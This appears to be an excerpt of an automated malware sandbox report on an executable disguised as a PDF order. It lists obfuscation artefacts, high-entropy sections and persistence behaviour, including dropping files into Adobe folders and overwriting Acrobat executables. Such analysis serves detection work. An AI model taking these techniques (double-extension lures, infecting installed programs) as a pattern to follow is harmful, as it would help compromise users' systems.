Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BEB180 push 00BEB2F2h; ret	0_2_00BEB262
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BEB180 push 00BEB255h; ret	0_2_00BEB2ED
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BEB180 push 00BEB2D0h; ret	0_2_00BEB346
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BEB180 push 00BEB37Fh; ret	0_2_00BEB3B7
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BE520C push 00BE528Fh; ret	0_2_00BE522D
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C07DF0 push 00C07D4Bh; ret	0_2_00C07D80
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C07DF0 push 00C07DD7h; ret	0_2_00C07D9F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C07DF0 push 00C07D5Fh; ret	0_2_00C07DB3
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C07DF0 push 00C081E6h; ret	0_2_00C07E2D
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C07DF0 push 00C07FCCh; ret	0_2_00C082BB
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C07DF0 push 00C08468h; ret	0_2_00C0852D
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BECD65h; ret	0_2_00BECC98
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BECD58h; ret	0_2_00BECCD8
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BECE1Ch; ret	0_2_00BECE1B
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BECFECh; ret	0_2_00BECEB2
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BED2B5h; ret	0_2_00BECF7B
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BED4CEh; ret	0_2_00BECFB6
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BED46Ch; ret	0_2_00BECFD6
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BED6E7h; ret	0_2_00BED0AB
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BED7C6h; ret	0_2_00BED15E
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BECE90 push 00BED003h; ret	0_2_00BED1DD

Source: Order SMG 201906 20190816order.pdf.scr.exe	Static PE information: section name: .reloc entropy: 7.871422860138387
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.9365246033050685
Source: surmit.exe.0.dr	Static PE information: section name: .reloc entropy: 7.871422860138387
Source: elevation_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9459574008201574
Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: section name: .reloc entropy: 7.934764583623069
Source: elevation_service.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.943946618150231
Source: 7zFM.exe.2.dr	Static PE information: section name: .reloc entropy: 7.932141619279196
Source: 7zG.exe.2.dr	Static PE information: section name: .reloc entropy: 7.927687378404275
Source: Acrobat.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940546071641888
Source: identity_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9407474312161845
Source: setup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.944742926103089
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936574494424014
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.942263045666707
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.946266130337125
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9440182396756605
Source: AcroCEF.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937560931031172
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943712869536628
Source: pwahelper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940901867989588
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.942276051129219
Source: pwahelper.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.940896909226027
Source: MicrosoftEdgeUpdateSetup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.939186551613667
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.937564708317289
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.943706869124912
Source: ADNotificationManager.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936836871038223
Source: AdobeCollabSync.exe.2.dr	Static PE information: section name: .reloc entropy: 7.90587968253039
Source: OneDriveSetup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.86651956015167
Source: Integrator.exe.2.dr	Static PE information: section name: .reloc entropy: 7.762411025022387
Source: CRLogTransport.exe.2.dr	Static PE information: section name: .reloc entropy: 7.938138676374595
Source: LogTransport2.exe.2.dr	Static PE information: section name: .reloc entropy: 7.935569958162582

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\314fa8116a46337b.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
